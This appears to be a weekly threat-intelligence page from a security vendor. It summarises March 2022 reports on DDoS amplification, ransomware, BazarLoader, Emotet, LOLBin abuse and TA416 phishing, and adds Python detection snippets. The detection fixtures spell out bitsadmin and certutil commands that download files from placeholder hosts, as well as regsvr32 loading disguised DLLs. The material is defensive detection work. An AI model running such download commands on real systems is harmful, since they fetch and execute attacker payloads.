The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings and run exposure checks on your endpoint devices and servers, which can help identify a successful payload delivery and compromise using a given vulnerability.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness

About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

We curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our craft are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles

Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us; we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

Google TAG Provides Update on Russian Threat Groups

March 15, 2022

Industry: Government, Media, Military | Level: Strategic | Source: GoogleTAG

Google’s Threat Analysis Group (TAG) provides an update on the threat actor groups APT28/FancyBear, Ghostwriter/UNC1151 and Mustang Panda/Temp.Hex, which are focusing their attacks on Ukraine. APT28/FancyBear activity has been identified in phishing campaigns conducted to obtain user credentials from a Ukrainian media site. Threat actor group Ghostwriter/UNC1151 has also conducted phishing campaigns targeting the Polish and Ukrainian government and military. Analysis of the China-based threat actor group Mustang Panda/Temp.Hex has identified the distribution of a malicious zip file that downloads a malicious payload.

CVE-2022-26143: TP240PhoneHome

March 15, 2022

Industry: N/A | Level: Strategic | Source: Akamai

A sharp increase in DDoS attacks utilizing UDP port 10074 has been observed since mid-February 2022 by a group of researchers from Akamai SIRT, Cloudflare, Lumen Black Lotus Labs, NETSCOUT Arbor ASERT, TELUS, Team Cymru, and The Shadowserver Foundation. The source of the activity has been determined to be “MiCollab and MiVoice Business Express collaboration systems produced by Mitel,” whose tp240dvr service is being abused. An estimated 2,600 systems were not properly provisioned: the service is designed to “stress-test its clients in order to facilitate debugging and performance testing” and “is not meant to be exposed to the Internet.” Attackers have utilized the exposed PBX VoIP gateways to execute high-volume reflection/amplification DDoS attacks. Impacted organizations observed include Internet service providers as well as those in the financial, gaming and logistics industries. From the researchers’ review, the largest observed attack was “approximately 53 million packets-per-second (mpps) and 23 gigabits-per-second (gb/sec). The average packet size for that attack was approximately 60 bytes, with an attack duration of approximately 5 minutes.” Mitel is currently working towards a patch to disable the exposed system test facility.
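As an added illustration (not code from Akamai or the report), the following Python check runs over constructed flow records to find internal hosts answering from UDP/10074 to the Internet, which is the exposure the researchers describe, and computes the per-peer byte amplification between trigger traffic and replies; the internal address range and the flow-record layout are assumptions.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

TP240_PORT = 10074                   # UDP port of the abused tp240dvr service (from the report)
INTERNAL = ip_network("10.0.0.0/8")  # assumption: the organisation's own address space

# Constructed flow records (not from the report):
# (src_ip, src_port, dst_ip, dst_port, proto, packets, bytes)
FLOWS = [
    ("203.0.113.9", 40000, "10.1.2.3", 10074, "udp", 2, 120),        # trigger packets
    ("10.1.2.3", 10074, "203.0.113.9", 40000, "udp", 9000, 540000),  # reply flood, ~60 B/pkt
    ("10.1.2.3", 443, "198.51.100.7", 51000, "tcp", 10, 5000),       # unrelated traffic
    ("10.9.9.9", 10074, "10.3.3.3", 41000, "udp", 4, 240),           # internal-only use
]

def is_internal(ip):
    return ip_address(ip) in INTERNAL

def exposed_tp240_hosts(flows):
    """Internal hosts that replied from UDP/10074 to an external address."""
    return {src for src, sport, dst, _dport, proto, _p, _b in flows
            if proto == "udp" and sport == TP240_PORT
            and is_internal(src) and not is_internal(dst)}

def amplification_by_peer(flows):
    """Bytes sent from UDP/10074 divided by bytes received on it, per (host, peer)."""
    sent, received = defaultdict(int), defaultdict(int)
    for src, sport, dst, dport, proto, _pkts, nbytes in flows:
        if proto != "udp":
            continue
        if dport == TP240_PORT and is_internal(dst) and not is_internal(src):
            received[(dst, src)] += nbytes
        elif sport == TP240_PORT and is_internal(src) and not is_internal(dst):
            sent[(src, dst)] += nbytes
    return {k: sent[k] / received[k] if received[k] else float("inf") for k in sent}

def alerts(flows, min_ratio=10.0):
    """(host, peer) pairs whose reply volume exceeds the trigger volume by min_ratio or more."""
    return sorted(k for k, r in amplification_by_peer(flows).items() if r >= min_ratio)
```

Any host returned by exposed_tp240_hosts is one whose test facility is reachable from the Internet and should be firewalled regardless of whether an amplification alert has fired yet.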

Cyber Incident Reporting Bill

March 15, 2022

Industry: Critical Infrastructure | Level: Strategic | Source: TheRecord

As reported by TheRecord, the United States Senate has approved legislation requiring that “critical infrastructure operations alert the Cybersecurity and Infrastructure Security Agency (CISA) within 72 hours of a breach and 24 hours if the organization pays a ransom.” The bill has been passed to United States President Joe Biden and is expected to be signed. The legislation, as stated by CISA Director Jen Easterly, would provide intelligence advantages: “these reports from our private sector partners [will be used] to build a common understanding of how our adversaries are targeting U.S. networks and critical infrastructure.”

CaddyWiper Data Wiper Attacks Ukraine

March 15, 2022

Initially discovered by ESET researchers and reported by BleepingComputer, a new data-destroying malware, named CaddyWiper, is attacking Ukrainian organizations.

CISA Update on Conti Ransomware

March 15, 2022

Industry: N/A | Level: Tactical | Source: CISA

The Cybersecurity & Infrastructure Security Agency (CISA) has updated alert AA21-265A, which tracks Conti ransomware, providing new indicators of compromise (IOCs) associated with the group. The most prevalent attack vectors the agency warns of for Conti include the use of Trickbot and Cobalt Strike. The Conti group has impacted over 1,000 organizations in the U.S. and internationally. A variety of techniques have been observed from the ransomware group, with initial access typically obtained through phishing emails or stolen accounts. CISA also describes a variety of post-compromise techniques, including RDP brute-force attacks, Kerberos attacks, running discovery commands to enumerate the network, spreading via SMB, stopping services and deleting shadow copies.

  • Anvilogic Use Cases:
    • RDP Brute-force Detection
    • Kerberos RC4 Encrypted Tickets
    • Common Reconnaissance Commands
    • Windows Share Multiple File Access
    • Service Stop Commands
    • Inhibit System Recovery Commands

RagnarLocker – FBI Flash Report

March 15, 2022

Industry: Energy, Financial Services, Government, Information Technology and Manufacturing | Level: Tactical | Source: DocumentCloud

The United States Federal Bureau of Investigation provides an update on RagnarLocker ransomware, which the bureau has been tracking since April 2020. The ransomware family has made a significant impact: “As of January 2022, the FBI has identified at least 52 entities across 10 critical manufacturing, energy, financial services, government and information technology sectors.” The ransomware performs a system check on the victim host and terminates if one of the following locales is identified: Azerbaijani, Armenian, Belorussian, Kazakh, Kyrgyz, Moldavian, Tajik, Russian, Turkmen, Uzbek, Ukrainian, or Georgian. Prior to encryption the ransomware deletes shadow copies. Not all files on the victim host are encrypted, as only “all available files of interest” are encrypted.

BazarLoader Malware Leverages Contact Forms

March 15, 2022

Industry: N/A | Level: Tactical | Source: AbnormalSecurity

Abnormal Security has observed BazarLoader incorporating online contact forms into its communication and distribution tactics. This recent campaign occurred between December 2021 and January 2022, with threat actors posing as prospective customers looking to obtain a product supply quote. As the communication appears genuine, the targeted company would typically follow up on the inquiry by initiating an email, to which the attacker would respond with a link to download a malicious file via file-sharing services such as TransferNow and WeTransfer. If downloaded, a .iso and a .log file would be dropped on the victim’s workstation. The ISO file is actually a .lnk shortcut file, and the .log file is the malicious BazarLoader DLL. If executed, the shortcut calls regsvr32.exe to run the disguised DLL, which performs process injection into svchost.exe. Further analysis of the campaign could not be completed as the command and control (C2) infrastructure was down. The threat actor’s objective is likely to use BazarLoader to deploy Conti ransomware or Cobalt Strike.

  • Anvilogic Use Cases:
    • Symbolic OR Hard File Link Created
    • regsvr32 Execution

Cybereason LOLBins & BITSadmin

March 15, 2022

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s threat hunting post dives into the usage of Living Off the Land Binaries (LOLBins), with a deep dive into the tool BITSadmin. Many malware and ransomware variants abuse trusted binaries for threat activity. Notable LOLBins utilized include msiexec, wscript, installutil, rundll32, regsvr32, wmic, certutil and bitsadmin. A variety of other applicable LOLBins can be reviewed in the LOLBAS project on GitHub, with many detections also available in the Anvilogic Armory. Analysis of BITSadmin identified that the tool has many applicable uses to “create, download, or upload jobs and monitor their progress,” as detailed in Microsoft’s documentation. Attackers have leveraged BITSadmin’s capabilities to maliciously download payloads and/or to copy and move files. Various malware families, such as the Astaroth malware, Egregor ransomware and Ramnit trojan, have utilized BITSadmin.

  • Anvilogic Scenario: Astaroth – Attack Chain with LOLBins
  • Anvilogic Use Cases:
    • BITSadmin Execution
    • Msiexec Abuse
    • Wscript/Cscript Execution
    • regsvr32 Execution
    • Rundll32 Command Line
    • Suspicious process Spawned by Java
    • Certutil File Download

Emotet Surges in Japan

March 15, 2022

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s tracking of Emotet malware in the first quarter of 2022 has identified a surge of Emotet activity against Japanese organizations. Emotet’s distribution has been identified through malicious Excel documents that download the malware upon execution. The malware uses regsvr32 to execute a malicious DLL file, although the file carries a .ocx extension. Subsequent events involve the malware establishing persistence in the registry and conducting reconnaissance activity. Cybereason noticed that Emotet, in its current attacks, has not utilized PowerShell for deployment.

  • Anvilogic Scenarios:
    • Emotet Behaviors
    • Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • regsvr32 Execution
    • New AutoRun Registry Key
    • Common Reconnaissance Commands
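As an added example (not code from Abnormal Security, Cybereason or Anvilogic), the following Python rules detect the regsvr32 behaviour described in the BazarLoader and Emotet reports above (a module loaded with a .log or .ocx rather than a .dll extension) alongside the BITSadmin and certutil download patterns from the LOLBins post; the event fields and the sample command lines are constructed assumptions, to be mapped onto your own EDR or Sysmon schema.

```python
import re
from typing import Optional

# Constructed Windows process-creation events (not from the reports).
# Fields are assumptions: parent image, image and full command line.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\alice\Downloads\quote.log"},
    {"parent": "excel.exe", "image": "regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\ProgramData\tmp\module.ocx"},
    {"parent": "cmd.exe", "image": "bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority high http://example.invalid/p.dat C:\Users\Public\p.dat"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": r"certutil -urlcache -split -f http://example.invalid/x.dat C:\Users\Public\x.dat"},
    {"parent": "msiexec.exe", "image": "regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\lib.dll"'},
]

def tokens(cmdline):
    """Split a Windows command line, keeping double-quoted paths intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def loaded_module(cmdline) -> Optional[str]:
    """Path regsvr32 was asked to load: the last argument that is not a switch."""
    args = [t for t in tokens(cmdline)[1:] if not t.startswith(("/", "-"))]
    return args[-1] if args else None

def regsvr32_non_dll(event):
    # BazarLoader hides its DLL as .log and Emotet as .ocx; regsvr32 loads either.
    if event["image"].lower() != "regsvr32.exe":
        return False
    path = loaded_module(event["cmdline"])
    return path is not None and not path.lower().endswith(".dll")

def bitsadmin_download(event):
    c = event["cmdline"].lower()
    return event["image"].lower() == "bitsadmin.exe" and ("/transfer" in c or "/download" in c)

def certutil_download(event):
    c = event["cmdline"].lower()
    return event["image"].lower() == "certutil.exe" and "-urlcache" in c and "http" in c

RULES = {
    "regsvr32 loading a non-.dll module": regsvr32_non_dll,
    "bitsadmin download job": bitsadmin_download,
    "certutil URL download": certutil_download,
}

def evaluate(events):
    """Return (rule name, parent image, command line) for every event matching a rule."""
    return [(name, e["parent"], e["cmdline"])
            for e in events for name, rule in RULES.items() if rule(e)]
```

The parent image is carried through so that an Excel parent, as in the Emotet campaign, can be used to raise the severity of a regsvr32 hit.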

TA416

March 15, 2022

Industry: N/A | Level: Tactical | Source: Proofpoint

Proofpoint research provides an update on activity since November 2021 involving the Chinese APT group TA416, which has initiated targeted campaigns against European diplomatic entities. An increase in activity has been observed since Russia’s invasion of Ukraine. A new technique was identified in the group’s phishing campaigns. Initially, the threat group utilizes web bugs to profile victims and obtain a “sign of life,” indicating to the attackers that the victim is active and can be enticed into opening malicious emails. Phishing emails have then been observed leveraging the “email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service.” The abuse of the SMTP2Go service has enabled the group to impersonate different European organizations. In the malicious phishing emails, the threat actor provides a Dropbox link to a zip file containing the PlugX malware executable. Upon execution, the malware establishes persistence through DLL search order hijacking using the PE file potplayermini.exe, associated with a public media player, and downloads additional payloads.

  • Anvilogic Use Cases:
    • Compressed File Execution
    • Executable File Written to Disk
    • Suspicious File written to Disk
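As an added example (not code from Proofpoint or Anvilogic), the following Python triage routine checks a raw message for the three traits the TA416 report describes: an envelope sender (Return-Path) whose domain differs from the From header, a remote image that can act as a web bug, and a link to a file-sharing host. The sample message, the sending-service domain and the list of file-sharing hosts are constructed assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Assumed file-sharing hosts to flag in links (Dropbox is the one named in the report).
FILE_SHARE_HOSTS = ("dropbox.com", "wetransfer.com")

# Constructed sample message (not from the report), modelled on the described lure:
# the envelope sender belongs to a mailing service while From impersonates an
# organisation, and the HTML body carries a tracking pixel and an archive link.
SAMPLE_MAIL = """\
Return-Path: <bounce-1234@mail.sending-service.invalid>
From: "Press Office" <press@ministry.example.invalid>
To: analyst@embassy.example.invalid
Subject: Updated briefing
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Please review the attached briefing.</p>
<a href="https://www.dropbox.com/s/placeholder/briefing.zip">briefing.zip</a>
<img src="https://track.sending-service.invalid/open.gif?id=1234" width="1" height="1">
</body></html>
"""

def domain_of(header_value):
    """Lower-cased domain part of an address header, or '' if none is present."""
    addr = parseaddr(header_value or "")[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""

def triage(raw):
    """Return a list of human-readable findings for one raw RFC 822 message."""
    msg = message_from_string(raw)
    findings = []
    env, hdr = domain_of(msg.get("Return-Path")), domain_of(msg.get("From"))
    if env and hdr and env != hdr and not env.endswith("." + hdr):
        findings.append(f"envelope sender {env} differs from From domain {hdr}")
    # Only single-part HTML bodies are inspected here; walk the parts for multipart mail.
    body = "" if msg.is_multipart() else msg.get_payload(decode=True).decode("utf-8", "replace")
    for src in re.findall(r'<img[^>]+src="([^"]+)"', body, re.I):
        if src.lower().startswith("http"):
            findings.append(f"remote image (possible web bug): {src}")
    for href in re.findall(r'href="([^"]+)"', body, re.I):
        host = re.sub(r"^https?://", "", href, flags=re.I).split("/")[0].lower()
        if any(host == h or host.endswith("." + h) for h in FILE_SHARE_HOSTS):
            findings.append(f"link to file-sharing host: {href}")
    return findings
```

A legitimate bulk mailing will also trip the envelope check, so treat the three findings together, not individually, as the signal for this lure.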